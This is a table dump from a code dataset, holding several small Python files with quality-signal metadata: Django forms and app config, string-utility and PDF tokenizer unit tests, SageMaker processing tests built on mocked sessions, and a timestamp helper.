hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
fe30097e1d2b1382d5837becffe994abaa11af97
| 157
|
py
|
Python
|
BootCRUDApp/forms.py
|
cs-fullstack-2019-spring/django-bootstrapcrud-cw-Litterial
|
1ec5b7785c1e4687a4889360a07c90b0c2217a82
|
[
"Apache-2.0"
] | null | null | null |
BootCRUDApp/forms.py
|
cs-fullstack-2019-spring/django-bootstrapcrud-cw-Litterial
|
1ec5b7785c1e4687a4889360a07c90b0c2217a82
|
[
"Apache-2.0"
] | null | null | null |
BootCRUDApp/forms.py
|
cs-fullstack-2019-spring/django-bootstrapcrud-cw-Litterial
|
1ec5b7785c1e4687a4889360a07c90b0c2217a82
|
[
"Apache-2.0"
] | null | null | null |
from django import forms
from .models import GarageSell
class GarageForm(forms.ModelForm):
class Meta:
model=GarageSell
fields='__all__'
| 22.428571
| 34
| 0.719745
| 18
| 157
| 6.055556
| 0.722222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.216561
| 157
| 7
| 35
| 22.428571
| 0.886179
| 0
| 0
| 0
| 0
| 0
| 0.044304
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 4
|
fe5306c67d321321987705fd174a43d053950205
| 92
|
py
|
Python
|
learn-web/techcoll/backend/WineStore/wine_item/apps.py
|
ornichola/learn-proramming
|
67f2e4d8846300db766e716b7ddf66bd54209fca
|
[
"Unlicense"
] | 1
|
2021-06-28T10:55:00.000Z
|
2021-06-28T10:55:00.000Z
|
learn-web/techcoll/backend/WineStore/wine_item/apps.py
|
ornichola/learn-proramming
|
67f2e4d8846300db766e716b7ddf66bd54209fca
|
[
"Unlicense"
] | null | null | null |
learn-web/techcoll/backend/WineStore/wine_item/apps.py
|
ornichola/learn-proramming
|
67f2e4d8846300db766e716b7ddf66bd54209fca
|
[
"Unlicense"
] | null | null | null |
from django.apps import AppConfig
class WineItemConfig(AppConfig):
name = 'wine_item'
| 15.333333
| 33
| 0.76087
| 11
| 92
| 6.272727
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.163043
| 92
| 5
| 34
| 18.4
| 0.896104
| 0
| 0
| 0
| 0
| 0
| 0.097826
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 4
|
fe7069fa07b14865d510f2b1d92e37656ea00e55
| 71
|
py
|
Python
|
xdgconfig/serializers/_yaml.py
|
Dogeek/pyconf
|
225be858d2259bbf4306f05c620cdfeaa3727cb9
|
[
"MIT"
] | 1
|
2021-03-28T02:43:03.000Z
|
2021-03-28T02:43:03.000Z
|
xdgconfig/serializers/_yaml.py
|
Dogeek/pyconf
|
225be858d2259bbf4306f05c620cdfeaa3727cb9
|
[
"MIT"
] | 20
|
2021-02-06T23:47:18.000Z
|
2021-03-28T02:41:27.000Z
|
xdgconfig/serializers/_yaml.py
|
Dogeek/xdgconfig
|
225be858d2259bbf4306f05c620cdfeaa3727cb9
|
[
"MIT"
] | null | null | null |
import yaml as yaml_
loads = yaml_.safe_load
dumps = yaml_.safe_dump
| 11.833333
| 23
| 0.774648
| 12
| 71
| 4.166667
| 0.666667
| 0.32
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.169014
| 71
| 5
| 24
| 14.2
| 0.847458
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 4
|
fe77274a420b708435cd3a1f3c20b8ac4167038e
| 2,531
|
py
|
Python
|
tests/python/pants_test/util/test_strutil.py
|
ghthor/pants
|
450de702414f87f563081ddefaefd8a554de07a3
|
[
"Apache-2.0"
] | null | null | null |
tests/python/pants_test/util/test_strutil.py
|
ghthor/pants
|
450de702414f87f563081ddefaefd8a554de07a3
|
[
"Apache-2.0"
] | null | null | null |
tests/python/pants_test/util/test_strutil.py
|
ghthor/pants
|
450de702414f87f563081ddefaefd8a554de07a3
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import absolute_import, division, print_function, unicode_literals
import unittest
from builtins import bytes
from pants.util.strutil import camelcase, ensure_binary, ensure_text, pluralize, strip_prefix
# TODO(Eric Ayers): Backfill tests for other methods in strutil.py
class StrutilTest(unittest.TestCase):
def test_camelcase(self):
self.assertEquals('Foo', camelcase('foo'))
self.assertEquals('Foo', camelcase('_foo'))
self.assertEquals('Foo', camelcase('foo_'))
self.assertEquals('FooBar', camelcase('foo_bar'))
self.assertEquals('FooBar', camelcase('foo_bar_'))
self.assertEquals('FooBar', camelcase('_foo_bar'))
self.assertEquals('FooBar', camelcase('foo__bar'))
self.assertEquals('Foo', camelcase('-foo'))
self.assertEquals('Foo', camelcase('foo-'))
self.assertEquals('FooBar', camelcase('foo-bar'))
self.assertEquals('FooBar', camelcase('foo-bar-'))
self.assertEquals('FooBar', camelcase('-foo-bar'))
self.assertEquals('FooBar', camelcase('foo--bar'))
self.assertEquals('FooBar', camelcase('foo-_bar'))
def test_pluralize(self):
self.assertEquals('1 bat', pluralize(1, 'bat'))
self.assertEquals('1 boss', pluralize(1, 'boss'))
self.assertEquals('2 bats', pluralize(2, 'bat'))
self.assertEquals('2 bosses', pluralize(2, 'boss'))
self.assertEquals('0 bats', pluralize(0, 'bat'))
self.assertEquals('0 bosses', pluralize(0, 'boss'))
def test_ensure_text(self):
bytes_val = bytes(bytearray([0xe5, 0xbf, 0xab]))
self.assertEquals(u'快', ensure_text(bytes_val))
with self.assertRaises(TypeError):
ensure_text(45)
def test_ensure_bytes(self):
unicode_val = u'快'
self.assertEquals(bytearray([0xe5, 0xbf, 0xab]), ensure_binary(unicode_val))
with self.assertRaises(TypeError):
ensure_binary(45)
def test_strip_prefix(self):
self.assertEquals('testString', strip_prefix('testString', '//'))
self.assertEquals('/testString', strip_prefix('/testString', '//'))
self.assertEquals('testString', strip_prefix('//testString', '//'))
self.assertEquals('/testString', strip_prefix('///testString', '//'))
self.assertEquals('//testString', strip_prefix('////testString', '//'))
self.assertEquals('test//String', strip_prefix('test//String', '//'))
self.assertEquals('testString//', strip_prefix('testString//', '//'))
| 41.491803
| 93
| 0.701699
| 296
| 2,531
| 5.85473
| 0.260135
| 0.267744
| 0.114253
| 0.160993
| 0.497403
| 0.497403
| 0.426428
| 0.426428
| 0.426428
| 0.426428
| 0
| 0.014027
| 0.126827
| 2,531
| 60
| 94
| 42.183333
| 0.770136
| 0.080601
| 0
| 0.044444
| 0
| 0
| 0.170543
| 0
| 0
| 0
| 0.010336
| 0.016667
| 0.688889
| 1
| 0.111111
| false
| 0
| 0.088889
| 0
| 0.222222
| 0.022222
| 0
| 0
| 0
| null | 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
fe8edaa9e9f80ea238a82c4fc397055b16de182d
| 417
|
py
|
Python
|
tests/test_pdfsyntax.py
|
desgeeko/pdfsyntax
|
990cfa9e798173a93af91583c7c763ed7321d87a
|
[
"MIT"
] | 27
|
2021-07-17T22:14:26.000Z
|
2021-12-10T19:41:48.000Z
|
tests/test_pdfsyntax.py
|
desgeeko/pdfsyntax
|
990cfa9e798173a93af91583c7c763ed7321d87a
|
[
"MIT"
] | null | null | null |
tests/test_pdfsyntax.py
|
desgeeko/pdfsyntax
|
990cfa9e798173a93af91583c7c763ed7321d87a
|
[
"MIT"
] | 1
|
2021-07-20T03:22:40.000Z
|
2021-07-20T03:22:40.000Z
|
import unittest
import pdfsyntax.docstruct as pdf
class Tokenization(unittest.TestCase):
def test_value(self):
self.assertEqual(pdf.next_token(b'74252 ', 0), (0, 5,'VALUE'))
def test_name(self):
self.assertEqual(pdf.next_token(b'/aaa ', 0), (0, 4, 'NAME'))
class Unicode(unittest.TestCase):
def test_unicode(self):
self.assertEqual(pdf.dec_unicode(b'\x00\x41'), 'A')
| 24.529412
| 70
| 0.657074
| 58
| 417
| 4.62069
| 0.482759
| 0.078358
| 0.212687
| 0.246269
| 0.238806
| 0.238806
| 0.238806
| 0
| 0
| 0
| 0
| 0.044379
| 0.189448
| 417
| 16
| 71
| 26.0625
| 0.748521
| 0
| 0
| 0
| 0
| 0
| 0.069712
| 0
| 0
| 0
| 0
| 0
| 0.3
| 1
| 0.3
| false
| 0
| 0.2
| 0
| 0.7
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 4
|
fe987f73ac0e6eb4687422615153bd30b1d25d9e
| 16,029
|
py
|
Python
|
tests/unit/test_processing.py
|
sboshin/sagemaker-python-sdk
|
5ae8965c647d2550ad3760726ca57454ce50123e
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/test_processing.py
|
sboshin/sagemaker-python-sdk
|
5ae8965c647d2550ad3760726ca57454ce50123e
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/test_processing.py
|
sboshin/sagemaker-python-sdk
|
5ae8965c647d2550ad3760726ca57454ce50123e
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
from __future__ import absolute_import
import pytest
from mock import Mock, patch
from sagemaker.processing import ProcessingInput, ProcessingOutput, Processor, ScriptProcessor
from sagemaker.sklearn.processing import SKLearnProcessor
from sagemaker.network import NetworkConfig
BUCKET_NAME = "mybucket"
REGION = "us-west-2"
ROLE = "arn:aws:iam::012345678901:role/SageMakerRole"
CUSTOM_IMAGE_URI = "012345678901.dkr.ecr.us-west-2.amazonaws.com/my-custom-image-uri"
@pytest.fixture()
def sagemaker_session():
boto_mock = Mock(name="boto_session", region_name=REGION)
session_mock = Mock(
name="sagemaker_session",
boto_session=boto_mock,
boto_region_name=REGION,
config=None,
local_mode=False,
)
session_mock.default_bucket = Mock(name="default_bucket", return_value=BUCKET_NAME)
session_mock.upload_data = Mock(
name="upload_data", return_value="mocked_s3_uri_from_upload_data"
)
session_mock.download_data = Mock(name="download_data")
return session_mock
def test_sklearn(sagemaker_session):
sklearn_processor = SKLearnProcessor(
framework_version="0.20.0",
role=ROLE,
instance_type="ml.m4.xlarge",
instance_count=1,
sagemaker_session=sagemaker_session,
)
with patch("os.path.isfile", return_value=True):
sklearn_processor.run(
code="/local/path/to/sklearn_transformer.py",
inputs=[
ProcessingInput(source="/local/path/to/my/dataset/census.csv", destination="/data/")
],
)
expected_args = {
"inputs": [
{
"InputName": "input-1",
"S3Input": {
"S3Uri": "mocked_s3_uri_from_upload_data",
"LocalPath": "/data/",
"S3DataType": "S3Prefix",
"S3InputMode": "File",
"S3DataDistributionType": "FullyReplicated",
"S3CompressionType": "None",
},
},
{
"InputName": "code",
"S3Input": {
"S3Uri": "mocked_s3_uri_from_upload_data",
"LocalPath": "/opt/ml/processing/input/code",
"S3DataType": "S3Prefix",
"S3InputMode": "File",
"S3DataDistributionType": "FullyReplicated",
"S3CompressionType": "None",
},
},
],
"output_config": {"Outputs": []},
"job_name": sklearn_processor._current_job_name,
"resources": {
"ClusterConfig": {
"InstanceType": "ml.m4.xlarge",
"InstanceCount": 1,
"VolumeSizeInGB": 30,
}
},
"stopping_condition": None,
"app_specification": {
"ImageUri": "246618743249.dkr.ecr.us-west-2.amazonaws.com/sagemaker-scikit-learn:0.20.0-cpu-py3",
"ContainerEntrypoint": [
"python3",
"/opt/ml/processing/input/code/sklearn_transformer.py",
],
},
"environment": None,
"network_config": None,
"role_arn": ROLE,
"tags": None,
"experiment_config": None,
}
sagemaker_session.process.assert_called_with(**expected_args)
def test_sklearn_with_no_inputs(sagemaker_session):
sklearn_processor = SKLearnProcessor(
framework_version="0.20.0",
role=ROLE,
command=["python3"],
instance_type="ml.m4.xlarge",
instance_count=1,
sagemaker_session=sagemaker_session,
)
with patch("os.path.isfile", return_value=True):
sklearn_processor.run(code="/local/path/to/sklearn_transformer.py")
expected_args = {
"inputs": [
{
"InputName": "code",
"S3Input": {
"S3Uri": "mocked_s3_uri_from_upload_data",
"LocalPath": "/opt/ml/processing/input/code",
"S3DataType": "S3Prefix",
"S3InputMode": "File",
"S3DataDistributionType": "FullyReplicated",
"S3CompressionType": "None",
},
}
],
"output_config": {"Outputs": []},
"job_name": sklearn_processor._current_job_name,
"resources": {
"ClusterConfig": {
"InstanceType": "ml.m4.xlarge",
"InstanceCount": 1,
"VolumeSizeInGB": 30,
}
},
"stopping_condition": None,
"app_specification": {
"ImageUri": "246618743249.dkr.ecr.us-west-2.amazonaws.com/sagemaker-scikit-learn:0.20.0-cpu-py3",
"ContainerEntrypoint": [
"python3",
"/opt/ml/processing/input/code/sklearn_transformer.py",
],
},
"environment": None,
"network_config": None,
"role_arn": ROLE,
"tags": None,
"experiment_config": None,
}
sagemaker_session.process.assert_called_with(**expected_args)
def test_sklearn_with_all_customizations(sagemaker_session):
sklearn_processor = SKLearnProcessor(
framework_version="0.20.0",
role=ROLE,
command=["python3"],
instance_type="ml.m4.xlarge",
instance_count=1,
volume_size_in_gb=100,
volume_kms_key=None,
output_kms_key="arn:aws:kms:us-west-2:012345678901:key/kms-key",
max_runtime_in_seconds=3600,
base_job_name="my_sklearn_processor",
env={"my_env_variable": "my_env_variable_value"},
tags=[{"Key": "my-tag", "Value": "my-tag-value"}],
network_config=NetworkConfig(
subnets=["my_subnet_id"],
security_group_ids=["my_security_group_id"],
enable_network_isolation=True,
),
sagemaker_session=sagemaker_session,
)
with patch("os.path.isdir", return_value=True):
sklearn_processor.run(
code="/local/path/to/sklearn_transformer.py",
inputs=[
ProcessingInput(
source="s3://path/to/my/dataset/census.csv",
destination="/container/path/",
input_name="my_dataset",
s3_data_type="S3Prefix",
s3_input_mode="File",
s3_data_distribution_type="FullyReplicated",
s3_compression_type="None",
)
],
outputs=[
ProcessingOutput(
source="/container/path/",
destination="s3://uri/",
output_name="my_output",
s3_upload_mode="EndOfJob",
)
],
arguments=["--drop-columns", "'SelfEmployed'"],
wait=True,
logs=False,
job_name="my_job_name",
experiment_config={"ExperimentName": "AnExperiment"},
)
expected_args = {
"inputs": [
{
"InputName": "my_dataset",
"S3Input": {
"S3Uri": "s3://path/to/my/dataset/census.csv",
"LocalPath": "/container/path/",
"S3DataType": "S3Prefix",
"S3InputMode": "File",
"S3DataDistributionType": "FullyReplicated",
"S3CompressionType": "None",
},
},
{
"InputName": "code",
"S3Input": {
"S3Uri": "mocked_s3_uri_from_upload_data",
"LocalPath": "/opt/ml/processing/input/code",
"S3DataType": "S3Prefix",
"S3InputMode": "File",
"S3DataDistributionType": "FullyReplicated",
"S3CompressionType": "None",
},
},
],
"output_config": {
"Outputs": [
{
"OutputName": "my_output",
"S3Output": {
"S3Uri": "s3://uri/",
"LocalPath": "/container/path/",
"S3UploadMode": "EndOfJob",
},
}
],
"KmsKeyId": "arn:aws:kms:us-west-2:012345678901:key/kms-key",
},
"job_name": sklearn_processor._current_job_name,
"resources": {
"ClusterConfig": {
"InstanceType": "ml.m4.xlarge",
"InstanceCount": 1,
"VolumeSizeInGB": 100,
}
},
"stopping_condition": {"MaxRuntimeInSeconds": 3600},
"app_specification": {
"ImageUri": "246618743249.dkr.ecr.us-west-2.amazonaws.com/sagemaker-scikit-learn:0.20.0-cpu-py3",
"ContainerArguments": ["--drop-columns", "'SelfEmployed'"],
"ContainerEntrypoint": [
"python3",
"/opt/ml/processing/input/code/sklearn_transformer.py",
],
},
"environment": {"my_env_variable": "my_env_variable_value"},
"network_config": {
"EnableNetworkIsolation": True,
"VpcConfig": {
"SecurityGroupIds": ["my_security_group_id"],
"Subnets": ["my_subnet_id"],
},
},
"role_arn": ROLE,
"tags": [{"Key": "my-tag", "Value": "my-tag-value"}],
"experiment_config": {"ExperimentName": "AnExperiment"},
}
sagemaker_session.process.assert_called_with(**expected_args)
def test_byo_container_with_script_processor(sagemaker_session):
script_processor = ScriptProcessor(
role=ROLE,
image_uri=CUSTOM_IMAGE_URI,
command=["python3"],
instance_count=1,
instance_type="ml.m4.xlarge",
sagemaker_session=sagemaker_session,
)
with patch("os.path.isfile", return_value=True):
script_processor.run(
code="/local/path/to/sklearn_transformer.py",
inputs=[
ProcessingInput(source="/local/path/to/my/dataset/census.csv", destination="/data/")
],
experiment_config={"ExperimentName": "AnExperiment"},
)
expected_args = {
"inputs": [
{
"InputName": "input-1",
"S3Input": {
"S3Uri": "mocked_s3_uri_from_upload_data",
"LocalPath": "/data/",
"S3DataType": "S3Prefix",
"S3InputMode": "File",
"S3DataDistributionType": "FullyReplicated",
"S3CompressionType": "None",
},
},
{
"InputName": "code",
"S3Input": {
"S3Uri": "mocked_s3_uri_from_upload_data",
"LocalPath": "/opt/ml/processing/input/code",
"S3DataType": "S3Prefix",
"S3InputMode": "File",
"S3DataDistributionType": "FullyReplicated",
"S3CompressionType": "None",
},
},
],
"output_config": {"Outputs": []},
"job_name": script_processor._current_job_name,
"resources": {
"ClusterConfig": {
"InstanceType": "ml.m4.xlarge",
"InstanceCount": 1,
"VolumeSizeInGB": 30,
}
},
"stopping_condition": None,
"app_specification": {
"ImageUri": CUSTOM_IMAGE_URI,
"ContainerEntrypoint": [
"python3",
"/opt/ml/processing/input/code/sklearn_transformer.py",
],
},
"environment": None,
"network_config": None,
"role_arn": ROLE,
"tags": None,
"experiment_config": {"ExperimentName": "AnExperiment"},
}
sagemaker_session.process.assert_called_with(**expected_args)
def test_byo_container_with_custom_script(sagemaker_session):
custom_processor = Processor(
role=ROLE,
image_uri=CUSTOM_IMAGE_URI,
instance_count=1,
instance_type="ml.m4.xlarge",
entrypoint="sklearn_transformer.py",
sagemaker_session=sagemaker_session,
)
custom_processor.run(
inputs=[
ProcessingInput(source="/local/path/to/my/dataset/census.csv", destination="/data/")
],
arguments=["CensusTract", "County"],
)
expected_args = {
"inputs": [
{
"InputName": "input-1",
"S3Input": {
"S3Uri": "mocked_s3_uri_from_upload_data",
"LocalPath": "/data/",
"S3DataType": "S3Prefix",
"S3InputMode": "File",
"S3DataDistributionType": "FullyReplicated",
"S3CompressionType": "None",
},
}
],
"output_config": {"Outputs": []},
"job_name": custom_processor._current_job_name,
"resources": {
"ClusterConfig": {
"InstanceType": "ml.m4.xlarge",
"InstanceCount": 1,
"VolumeSizeInGB": 30,
}
},
"stopping_condition": None,
"app_specification": {
"ImageUri": CUSTOM_IMAGE_URI,
"ContainerArguments": ["CensusTract", "County"],
"ContainerEntrypoint": "sklearn_transformer.py",
},
"environment": None,
"network_config": None,
"role_arn": ROLE,
"tags": None,
"experiment_config": None,
}
sagemaker_session.process.assert_called_with(**expected_args)
def test_byo_container_with_baked_in_script(sagemaker_session):
custom_processor = Processor(
role=ROLE,
image_uri=CUSTOM_IMAGE_URI,
instance_count=1,
instance_type="ml.m4.xlarge",
sagemaker_session=sagemaker_session,
)
custom_processor.run(
inputs=[
ProcessingInput(source="/local/path/to/my/sklearn_transformer", destination="/code/")
],
arguments=["CensusTract", "County"],
)
expected_args = {
"inputs": [
{
"InputName": "input-1",
"S3Input": {
"S3Uri": "mocked_s3_uri_from_upload_data",
"LocalPath": "/code/",
"S3DataType": "S3Prefix",
"S3InputMode": "File",
"S3DataDistributionType": "FullyReplicated",
"S3CompressionType": "None",
},
}
],
"output_config": {"Outputs": []},
"job_name": custom_processor._current_job_name,
"resources": {
"ClusterConfig": {
"InstanceType": "ml.m4.xlarge",
"InstanceCount": 1,
"VolumeSizeInGB": 30,
}
},
"stopping_condition": None,
"app_specification": {
"ImageUri": CUSTOM_IMAGE_URI,
"ContainerArguments": ["CensusTract", "County"],
},
"environment": None,
"network_config": None,
"role_arn": ROLE,
"tags": None,
"experiment_config": None,
}
sagemaker_session.process.assert_called_with(**expected_args)
| 34.545259
| 109
| 0.526795
| 1,344
| 16,029
| 6.034226
| 0.172619
| 0.051295
| 0.014797
| 0.016646
| 0.731196
| 0.731196
| 0.728113
| 0.705919
| 0.679778
| 0.679778
| 0
| 0.025803
| 0.347183
| 16,029
| 463
| 110
| 34.61987
| 0.749235
| 0.033689
| 0
| 0.620853
| 0
| 0.009479
| 0.324115
| 0.1103
| 0
| 0
| 0
| 0
| 0.014218
| 1
| 0.016588
| false
| 0
| 0.014218
| 0
| 0.033175
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
fe991d8214ead90d6f9e7957d51d47579acb4a06
| 251
|
py
|
Python
|
spaced_repetition/use_cases/helpers.py
|
MBlistein/spaced-repetition
|
c10281d43e928f8d1799076190f962f8e49a405b
|
[
"MIT"
] | null | null | null |
spaced_repetition/use_cases/helpers.py
|
MBlistein/spaced-repetition
|
c10281d43e928f8d1799076190f962f8e49a405b
|
[
"MIT"
] | null | null | null |
spaced_repetition/use_cases/helpers.py
|
MBlistein/spaced-repetition
|
c10281d43e928f8d1799076190f962f8e49a405b
|
[
"MIT"
] | null | null | null |
"""Time serialization"""
import datetime as dt
TS_FORMAT = '%Y-%m-%d %H:%M:%S'
def deserialize_ts(ts_str: str):
return dt.datetime.strptime(ts_str, TS_FORMAT)
def serialize_ts(ts: dt.datetime):
return dt.datetime.strftime(ts, TS_FORMAT)
| 17.928571
| 50
| 0.705179
| 41
| 251
| 4.146341
| 0.487805
| 0.141176
| 0.188235
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.143426
| 251
| 13
| 51
| 19.307692
| 0.790698
| 0.071713
| 0
| 0
| 0
| 0
| 0.07489
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.166667
| 0.333333
| 0.833333
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 4
|
fea0f88e701ae4c9deccdd001cd1b7f9813c390c
| 94
|
py
|
Python
|
maternal-dashboard-1/__init__.py
|
becca-mayers/maternal-health-dashboard
|
d471f672f7373c4e1ca1637bf1e1edb1cbc151f4
|
[
"MIT"
] | null | null | null |
maternal-dashboard-1/__init__.py
|
becca-mayers/maternal-health-dashboard
|
d471f672f7373c4e1ca1637bf1e1edb1cbc151f4
|
[
"MIT"
] | null | null | null |
maternal-dashboard-1/__init__.py
|
becca-mayers/maternal-health-dashboard
|
d471f672f7373c4e1ca1637bf1e1edb1cbc151f4
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
